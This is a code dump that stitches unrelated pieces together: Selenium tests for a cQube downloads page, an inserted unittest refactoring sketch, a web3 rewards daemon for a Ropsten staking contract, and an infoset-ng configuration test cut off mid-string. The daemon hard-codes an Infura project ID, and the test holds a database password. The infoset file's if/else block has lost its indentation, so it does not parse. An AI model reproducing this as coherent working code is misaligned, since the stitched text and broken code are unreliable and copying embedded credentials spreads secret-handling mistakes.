        print(bucket_name.options[1].text, 'is selected')
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("btn")
        if "s3FileDownload" in self.driver.current_url:
            print("s3FileDownload page is displayed")
        else:
            print("s3FileDownload page does not exist")
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id('btn').click()
        self.data.page_loading(self.driver)
    def test_cqube_input(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        print("choosing radio button and downloading s3 files")
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        bucket_name.select_by_visible_text(' cqube-qa-input ')
        self.data.page_loading(self.driver)
        self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("btn").click()
        time.sleep(3)
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_cqube_output(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        print("choosing radio button and downloading s3 files")
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        bucket_name.select_by_visible_text(' cqube-qa-output ')
        self.data.page_loading(self.driver)
        self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("btn").click()
        time.sleep(3)
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_cqube_emission(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        print("choosing radio button and downloading s3 files")
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        bucket_name.select_by_visible_text(' cqube-qa-emission ')
        self.data.page_loading(self.driver)
        self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("btn").click()
        time.sleep(3)
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_logoutbtn(self):
        count = 0
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id(Data.logout).click()
        self.data.page_loading(self.driver)
        if 'Log in to cQube' in self.driver.title:
            print('Logout button is working')
        else:
            print('Logout button is not working')
            count = count + 1
        self.data.page_loading(self.driver)
        self.data.login_to_adminconsole(self.driver)
        self.assertEqual(0, count, msg='Logout failed')
        self.data.page_loading(self.driver)
    @classmethod
    def tearDownClass(cls):
        cls.driver.close()
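Every test in this class repeats the same dashboard → downloads navigation. One way to cut that duplication is a small helper method combined with the class-level fixture pattern already used here. The sketch below is framework-free — a fake driver stands in for Selenium so the lifecycle can run anywhere, and the page names are illustrative:

```python
import unittest

class FakeDriver:
    """Stands in for a Selenium WebDriver in this sketch."""
    def __init__(self):
        self.visits = []
        self.closed = False
    def open(self, page):
        self.visits.append(page)
    def close(self):
        self.closed = True

class DownloadsPageTest(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        cls.driver = FakeDriver()        # one shared driver, as in Test_s3files

    def _open_downloads(self):
        # centralises the repeated dashboard -> downloads navigation
        self.driver.open("dashboard")
        self.driver.open("downloads")

    def test_first(self):
        self._open_downloads()
        self.assertEqual(self.driver.visits[-1], "downloads")

    def test_second(self):
        self._open_downloads()
        self.assertEqual(self.driver.visits[-1], "downloads")

    @classmethod
    def tearDownClass(cls):
        cls.driver.close()               # runs once, after all tests

suite = unittest.defaultTestLoader.loadTestsFromTestCase(DownloadsPageTest)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print(result.wasSuccessful(), result.testsRun)   # → True 2
```

With Selenium the helper body would be the two `find_element_by_id(...).click()` calls plus `page_loading`, and each `test_*` method shrinks to the behaviour it actually checks.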
# ============================================================
# File: frontend/src/rewards_node_daemon/rewards_daemon_ropsten.py
# Repo: cmayorga/blockchain-developer-bootcamp-final-project (MIT)
# ============================================================
# only for CONSRewards v2
import json
import sys
from datetime import datetime, timezone

from web3 import Web3

if len(sys.argv) < 3:
    print("Usage details: rewards_daemon.py owner_address owner_address_private_key")
    exit()
#CONSUser = "0xFC8d59ed72dc74007131e894cf1Be9Ea9A38C554"
CONSRewards_address = "0xcf87c85097ac3c8af52e8b29bff1fbb38068e35c"
eth_url = "https://ropsten.infura.io/v3/17aaa2ed017c44edaf69e8859d2cd89c" #CARLOS
web3 = Web3(Web3.HTTPProvider(eth_url))
chainId = 3 #Ropsten
owner_address = web3.toChecksumAddress(sys.argv[1]) # CONSRewards Owner address
owner_pc = sys.argv[2] # CONSRewards Owner address Private key
address = web3.toChecksumAddress(CONSRewards_address)
#CONS Rewards smart contract: abi, address and bytecode
abi = json.loads('[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"reward","type":"uint256"}],"name":"RewardAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"reward","type":"uint256"}],"name":"RewardPaid","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Staked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Withdrawn","type":"event"},{"constant":true,"inputs":[],"name":"CARLOS","outputs":[{"internalType":"contract IERC20","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"DURATION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"CONS","outputs":[{"internalType":"contract 
IERC20","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"accumulatedStakingPower","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"extrareward","type":"uint256"}],"name":"addExtraReward","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"blockts","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"currentEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"earned","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"exit","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"extraEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"fixedCurrentEpochReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getReward","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs"
:[],"name":"isOwner","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastTimeRewardApplicable","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastUpdateTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"name":"notifyRewardAmount","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"periodFinish","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"rewardPerToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardPerTokenStored","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"rewardSystemFinished","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"rewa
rds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"bool","name":"finished","type":"bool"}],"name":"setFarmingFinished","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"stake","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"stakingPower","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"starttime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalAccumulatedReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userRewardPerTokenPaid","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]')
bytecode = "6080604052600080546001600160a01b0319908116739f0523e2194873227b9d462ed0970a3debb634a9178255600480549091167344c20d6869ec46b78e76bd9c051518476a9bbdc017905560078190556008819055426009819055600a829055600b805460ff19169055600c55600d556100816001600160e01b036100d216565b600380546001600160a01b0319166001600160a01b0392831617908190556040519116906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a36100d6565b3390565b611a4b806100e56000396000f3fe608060405234801561001057600080fd5b50600436106102055760003560e01c80638da588971161011a578063ddc2b169116100ad578063e9fad8ee1161007c578063e9fad8ee14610437578063ebe2b12b1461043f578063ed92091414610447578063f2fde38b1461044f578063ffe489021461047557610205565b8063ddc2b169146103f9578063df136d6514610401578063e68e035b14610409578063e9b46e6d1461041157610205565b8063a694fc3a116100e9578063a694fc3a146103c4578063c8f33c91146103e1578063cd3daf9d146103e9578063d3d4a5af146103f157610205565b80638da58897146103745780638da5cb5b1461037c5780638f32d59b146103a05780639c916d19146103bc57610205565b806353cef1d21161019d5780637b0a47ee1161016c5780637b0a47ee1461032e5780637e126d98146103365780637fba03a01461033e57806380faa57d146103465780638b8763471461034e57610205565b806353cef1d2146102c4578063635cb4e2146102e357806370a0823114610300578063715018a61461032657610205565b8063207e821d116101d9578063207e821d146102785780632e1a7d4d146102805780633c6b16ab1461029f5780633d18b912146102bc57610205565b80628cc2621461020a5780630700037d1461024257806318160ddd146102685780631be0528914610270575b600080fd5b6102306004803603602081101561022057600080fd5b50356001600160a01b031661049b565b60408051918252519081900360200190f35b6102306004803603602081101561025857600080fd5b50356001600160a01b0316610521565b610230610533565b61023061053a565b610230610541565b61029d6004803603602081101561029657600080fd5b5035610547565b005b61029d600480360360208110156102b557600080fd5b503561063a565b61029d610819565b61029d600480360360208110156102da57600080fd5b50351515610b83565b61029d600480360360208110156102f957600080fd5b503561
0be1565b6102306004803603602081101561031657600080fd5b50356001600160a01b0316610ca1565b61029d610cbc565b610230610d4d565b610230610d53565b610230610d59565b610230610d5f565b6102306004803603602081101561036457600080fd5b50356001600160a01b0316610d72565b610230610d84565b610384610d8a565b604080516001600160a01b039092168252519081900360200190f35b6103a8610d99565b604080519115158252519081900360200190f35b610384610dbf565b61029d600480360360208110156103da57600080fd5b5035610dce565b6102306110ac565b6102306110b2565b610230611106565b6103a861110c565b610230611115565b61023061111b565b6102306004803603602081101561042757600080fd5b50356001600160a01b0316611121565b61029d611133565b61023061114e565b610384611154565b61029d6004803603602081101561046557600080fd5b50356001600160a01b0316611163565b6102306004803603602081101561048b57600080fd5b50356001600160a01b03166111b3565b6001600160a01b038116600090815260116020908152604080832054601090925282205461051b919061050f90670de0b6b3a764000090610503906104ee906104e26110b2565b9063ffffffff6111e616565b6104f788610ca1565b9063ffffffff61122f16565b9063ffffffff61128816565b9063ffffffff6112ca16565b92915050565b60116020526000908152604090205481565b6001545b90565b62093a8081565b60085481565b600b54339060ff1661056a5761055b6110b2565b600f55610566610d5f565b600e555b6001600160a01b038116156105ae576105828161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b600082116105f7576040805162461bcd60e51b8152602060048201526011602482015270043616e6e6f74207769746864726177203607c1b604482015290519081900360640190fd5b61060082611324565b60408051838152905133917f7084f5476618d8e60b11ef0d7d3f06914655adb8793e28ff7f018d4c76d505d5919081900360200190a25050565b610642610d99565b610681576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460009060ff166106a5576106966110b2565b600f556106a1610d5f565b600e555b6001600160a01b038116156106e9576106bd8161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152
919020555b600a54156107285760405162461bcd60e51b81526004018080602001828103825260238152602001806119f46023913960400191505060405180910390fd5b4260095560058290556006829055600854610749908363ffffffff6112ca16565b6008556005546107629062093a8063ffffffff61128816565b600d5542600e81905561077e9062093a8063ffffffff6112ca16565b600a5560048054600554604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b1580156107d957600080fd5b505af11580156107ed573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a15050565b600b54339060ff1661083c5761082d6110b2565b600f55610838610d5f565b600e555b6001600160a01b03811615610880576108548161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b60095442116108c2576040805162461bcd60e51b81526020600482015260096024820152681b9bdd081cdd185c9d60ba1b604482015290519081900360640190fd5b6000600a5411610910576040805162461bcd60e51b8152602060048201526014602482015273141bdbdb081a185cc81b9bdd081cdd185c9d195960621b604482015290519081900360640190fd5b42600c819055600a541180159061092a5750600b5460ff16155b15610a6e5761094a6064610503600560065461122f90919063ffffffff16565b6006540360068190555060016006541115610a5b576007546006546109749163ffffffff6112ca16565b600581905560006007556008546109909163ffffffff6112ca16565b6008556005546109a99062093a8063ffffffff61128816565b600d556109bf4262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b158015610a1a57600080fd5b505af1158015610a2e573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a1610a69565b600b805460ff191660011790555b42600e555b6000610a793361049b565b90508015610b7f5733600090815260116020908152604080832054601290925290912054610aac9163ffffffff6112ca16565b3360008181526012602090815260408083209490945560118152838220829055
60048054855163a9059cbb60e01b8152918201949094526024810186905293516001600160a01b039093169363a9059cbb9360448083019491928390030190829087803b158015610b1c57600080fd5b505af1158015610b30573d6000803e3d6000fd5b505050506040513d6020811015610b4657600080fd5b505060408051828152905133917fe2403640ba68fed3a2f88b7557551d1993f84b99bb10ff833f0cf8db0c5e0486919081900360200190a25b5050565b610b8b610d99565b610bca576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b42600e55600b805460ff1916911515919091179055565b610be9610d99565b610c28576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460ff1615610c80576040805162461bcd60e51b815260206004820152601760248201527f4661726d696e672069732066696e697368656420796574000000000000000000604482015290519081900360640190fd5b600754610c93908263ffffffff6112ca16565b600755610c9e6113ed565b50565b6001600160a01b031660009081526002602052604090205490565b610cc4610d99565b610d03576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b6003546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600380546001600160a01b0319169055565b600d5481565b60065481565b600c5481565b6000610d6d42600a546115fc565b905090565b60106020526000908152604090205481565b60095481565b6003546001600160a01b031690565b6003546000906001600160a01b0316610db0611612565b6001600160a01b031614905090565b6000546001600160a01b031681565b600b54339060ff16610df157610de26110b2565b600f55610ded610d5f565b600e555b6001600160a01b03811615610e3557610e098161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b42600c819055600a5411801590610e4f5750600b5460ff16155b15610f9357610e6f6064610503600560065461122f90919063ffffffff16565b6006540360068190555060016006541115610f8057600754600654610e999163ffffffff6112ca16565b60058190556000600755600854610eb59163ffffffff6112ca1656
5b600855600554610ece9062093a8063ffffffff61128816565b600d55610ee44262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b158015610f3f57600080fd5b505af1158015610f53573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a1610f8e565b600b805460ff191660011790555b42600e555b6009544211610fd5576040805162461bcd60e51b81526020600482015260096024820152681b9bdd081cdd185c9d60ba1b604482015290519081900360640190fd5b6000600a5411611023576040805162461bcd60e51b8152602060048201526014602482015273141bdbdb081a185cc81b9bdd081cdd185c9d195960621b604482015290519081900360640190fd5b60008211611069576040805162461bcd60e51b815260206004820152600e60248201526d043616e6e6f74207374616b6520360941b604482015290519081900360640190fd5b61107282611616565b60408051838152905133917f9e71bc8eea02a63969f509818f2dafb9254532904319f9dbda79b67bd34a5f3d919081900360200190a25050565b600e5481565b60006110bc610533565b6110c95750600f54610537565b610d6d6110f76110d7610533565b610503670de0b6b3a76400006104f7600d546104f7600e546104e2610d5f565b600f549063ffffffff6112ca16565b60075481565b600b5460ff1681565b600f5481565b60055481565b60126020526000908152604090205481565b61114461113f33610ca1565b610547565b61114c610819565b565b600a5481565b6004546001600160a01b031681565b61116b610d99565b6111aa576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b610c9e81611793565b600061051b6111c18361049b565b6001600160a01b0384166000908152601260205260409020549063ffffffff6112ca16565b600061122883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611834565b9392505050565b60008261123e5750600061051b565b8282028284828161124b57fe5b04146112285760405162461bcd60e51b81526004018080602001828103825260218152602001806119b36021913960400191505060405180910390fd5b600061122883836040518060400160405280601a
81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506118cb565b600082820183811015611228576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b600154611337908263ffffffff6111e616565b6001553360009081526002602052604090205461135a908263ffffffff6111e616565b336000818152600260209081526040808320949094558154845163a9059cbb60e01b815260048101949094526024840186905293516001600160a01b039094169363a9059cbb93604480820194918390030190829087803b1580156113be57600080fd5b505af11580156113d2573d6000803e3d6000fd5b505050506040513d60208110156113e857600080fd5b505050565b6113f5610d99565b611434576040805162461bcd60e51b815260206004820181905260248201526000805160206119d4833981519152604482015290519081900360640190fd5b600b5460009060ff16611458576114496110b2565b600f55611454610d5f565b600e555b6001600160a01b0381161561149c576114708161049b565b6001600160a01b038216600090815260116020908152604080832093909355600f546010909152919020555b42600c819055600a54118015906114b65750600b5460ff16155b15610c9e576114d66064610503600560065461122f90919063ffffffff16565b60065403600681905550600160065411156115e7576007546006546115009163ffffffff6112ca16565b6005819055600060075560085461151c9163ffffffff6112ca16565b6008556005546115359062093a8063ffffffff61128816565b600d5561154b4262093a8063ffffffff6112ca16565b600a5560048054600654604080516340c10f1960e01b815230948101949094526024840191909152516001600160a01b03909116916340c10f1991604480830192600092919082900301818387803b1580156115a657600080fd5b505af11580156115ba573d6000803e3d6000fd5b505060055460408051918252516000805160206119938339815191529350908190036020019150a16115f5565b600b805460ff191660011790555b42600e5550565b600081831061160b5781611228565b5090919050565b3390565b3361162081611930565b15611665576040805162461bcd60e51b815260206004820152601060248201526f1c1b1e8819985c9b48189e481a185b9960821b604482015290519081900360640190fd5b326001600160a01b038216146116b5576040805162461bcd60e51b81526020
6004820152601060248201526f1c1b1e8819985c9b48189e481a185b9960821b604482015290519081900360640190fd5b6001546116c8908363ffffffff6112ca16565b6001556001600160a01b0381166000908152600260205260409020546116f4908363ffffffff6112ca16565b6001600160a01b03808316600081815260026020908152604080832095909555815485516323b872dd60e01b8152600481019490945230602485015260448401889052945194909316936323b872dd936064808501949193918390030190829087803b15801561176357600080fd5b505af1158015611777573d6000803e3d6000fd5b505050506040513d602081101561178d57600080fd5b50505050565b6001600160a01b0381166117d85760405162461bcd60e51b815260040180806020018281038252602681526020018061196d6026913960400191505060405180910390fd5b6003546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600380546001600160a01b0319166001600160a01b0392909216919091179055565b600081848411156118c35760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015611888578181015183820152602001611870565b50505050905090810190601f1680156118b55780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b6000818361191a5760405162461bcd60e51b8152602060048201818152835160248401528351909283926044909101919085019080838360008315611888578181015183820152602001611870565b50600083858161192657fe5b0495945050505050565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081158015906119645750808214155b94935050505056fe4f776e61626c653a206e6577206f776e657220697320746865207a65726f2061646472657373de88a922e0d3b88b24e9623efeb464919c6bf9f66857a65e2bfcf2ce87a9433d536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f774f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65724f6e6c792063616e2063616c6c206f6e636520746f207374617274207374616b696e67a265627a7a723158207c0bc63ebc4c66dd2aa5d49ce459422f8fc01932571681d8b80632b1e2d1c42464736f6c63430005110032"
contract = web3.eth.contract(address = address, abi = abi, bytecode = bytecode)
#con = contract.functions.rewardPerToken().call()
#print(con)
##transaction = contract.functions.notifyRewardAmount(rewardAmount).buildTransaction({'chainId': chainId, 'gas':80000, 'nonce': web3.eth.getTransactionCount(owner_address)})
periodFinish = contract.functions.periodFinish().call()
#blockinfo = web3.eth.getBlock('latest')
#print("blockinfo: ", blockinfo)
#last_block_timestamp = web3.eth.getBlock('latest').timestamp
#print("last_block_timestamp: ", last_block_timestamp)
dt = datetime.now(timezone.utc)
now_utc = dt.timestamp()
print("period_finish: ", periodFinish)
print("current system_time_utc: ", now_utc)
tdelta = datetime.fromtimestamp(now_utc) - datetime.fromtimestamp(periodFinish)
# tdelta is negative while periodFinish is still in the future
seconds = tdelta.total_seconds()
print('difference is {0} seconds'.format(abs(seconds)))
if seconds < 60:
    print(now_utc, " is lower than ", periodFinish, ", nothing to do")
else:
    #exit(1) #debugging
    print(now_utc, " is greater than ", periodFinish, ", updating rewards")
    rewardAmount = 690000 * 10**18  # 690,000 tokens in 18-decimal base units
    print("rewardAmount:", rewardAmount)
    transaction = contract.functions.addExtraReward(int(rewardAmount)).buildTransaction(
        {'chainId': chainId, 'gas': 200000,
         'nonce': web3.eth.getTransactionCount(owner_address)})
    print(transaction)
    # Signing and broadcasting are commented out for debugging
    #signed_txn = web3.eth.account.signTransaction(transaction, owner_pc)
    #txn_hash = web3.eth.sendRawTransaction(signed_txn.rawTransaction)
    #print(txn_hash)
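The daemon's only scheduling decision is the comparison above: the on-chain `periodFinish` timestamp against the current UTC time, with a small grace window. That logic can be isolated and tested offline without an RPC endpoint; a minimal sketch, where `should_update_rewards` is a hypothetical helper name, not part of the original script:

```python
from datetime import datetime, timezone

def should_update_rewards(period_finish, now_utc=None, grace_seconds=60):
    """Return True once the reward period ended at least grace_seconds ago."""
    if now_utc is None:
        # Fall back to the current UTC time, as the daemon does
        now_utc = datetime.now(timezone.utc).timestamp()
    return (now_utc - period_finish) >= grace_seconds

# Period finished 2 hours ago: time to send addExtraReward()
assert should_update_rewards(1_000_000, now_utc=1_007_200)
# Period finished only 30 s ago (inside the grace window): nothing to do
assert not should_update_rewards(1_000_000, now_utc=1_000_030)
```

Keeping this check in a pure function makes the cron-driven behaviour verifiable without touching Infura or the contract.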
#!/usr/bin/env python3
# infoset/test/test_configuration.py
# repo: clayton-colovore/infoset-ng (Apache-2.0)
"""Test the db_agent library in the infoset.db module."""
import os.path
import tempfile
import unittest
import yaml
import os
import sys
# Try to create a working PYTHONPATH
_TEST_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
_LIB_DIRECTORY = os.path.abspath(os.path.join(_TEST_DIRECTORY, os.pardir))
_ROOT_DIRECTORY = os.path.abspath(os.path.join(_LIB_DIRECTORY, os.pardir))
if _TEST_DIRECTORY.endswith('/infoset-ng/infoset/test') is True:
sys.path.append(_ROOT_DIRECTORY)
else:
print(
'This script is not installed in the "infoset-ng/bin" directory. '
'Please fix.')
sys.exit(2)
from infoset.utils import configuration
class TestConfiguration(unittest.TestCase):
    """Checks all functions and methods."""

    #########################################################################
    # General object setup
    #########################################################################

    log_directory = tempfile.mkdtemp()
    cache_directory = tempfile.mkdtemp()
    good_config = ("""\
main:
    log_directory: %s
    log_level: debug
    ingest_cache_directory: %s
    ingest_pool_size: 20
    bind_port: 3000
    interval: 300
    sqlalchemy_pool_size: 10
    sqlalchemy_max_overflow: 10
    memcached_hostname: localhost
    memcached_port: 22122
    db_hostname: localhost
    db_username: test_infoset
    db_password: test_B3bFHgxQfsEy86TN
    db_name: test_infoset
""") % (log_directory, cache_directory)

    # Convert good_config to dictionary
    good_dict = yaml.safe_load(bytes(good_config, 'utf-8'))

    # Set the environmental variable for the configuration directory
    directory = tempfile.mkdtemp()
    os.environ['INFOSET_CONFIGDIR'] = directory
    config_file = ('%s/test_config.yaml') % (directory)

    # Write good_config to file
    with open(config_file, 'w') as f_handle:
        yaml.dump(good_dict, f_handle, default_flow_style=True)

    # Create configuration object
    config = configuration.Config()
    @classmethod
    def tearDownClass(cls):
        """Post test cleanup."""
        os.rmdir(cls.log_directory)
        os.rmdir(cls.cache_directory)
        os.remove(cls.config_file)
        os.rmdir(cls.directory)
    def test_init(self):
        """Testing method init."""
        # Testing with a non-existent directory
        directory = 'bogus'
        os.environ['INFOSET_CONFIGDIR'] = directory
        with self.assertRaises(SystemExit):
            configuration.Config()

        # Testing with an empty directory
        empty_directory = tempfile.mkdtemp()
        os.environ['INFOSET_CONFIGDIR'] = empty_directory
        with self.assertRaises(SystemExit):
            configuration.Config()

        # Write an empty config to file
        empty_config_file = ('%s/test_config.yaml') % (empty_directory)
        with open(empty_config_file, 'w') as f_handle:
            f_handle.write('')

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.log_file()

        # Cleanup files in temp directories
        _delete_files(empty_directory)
    def test_log_file(self):
        """Testing method log_file."""
        # Test log_file with the good dictionary:
        # good key and key_value
        result = self.config.log_file()
        self.assertEqual(result, ('%s/infoset-ng.log') % (self.log_directory))

    def test_web_log_file(self):
        """Testing method web_log_file."""
        # Testing web_log_file with a good dictionary
        result = self.config.web_log_file()
        self.assertEqual(result, ('%s/api-web.log') % (self.log_directory))
    def test_log_level(self):
        """Testing method log_level."""
        # Testing with the good dictionary:
        # good key and good key_value
        result = self.config.log_level()
        self.assertEqual(result, 'debug')
        self.assertEqual(result, self.good_dict['main']['log_level'])

        # Set the environmental variable for the configuration directory
        directory = tempfile.mkdtemp()
        os.environ['INFOSET_CONFIGDIR'] = directory
        config_file = ('%s/test_config.yaml') % (directory)

        # Testing log_level with blank key and blank key_value
        key = ''
        key_value = ''
        bad_config = ("""\
main:
    %s %s
""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))

        # Write bad_config to file
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.log_level()

        # Testing log_level with good key and blank key_value
        key = 'log_level:'
        key_value = ''
        bad_config = ("""\
main:
    %s %s
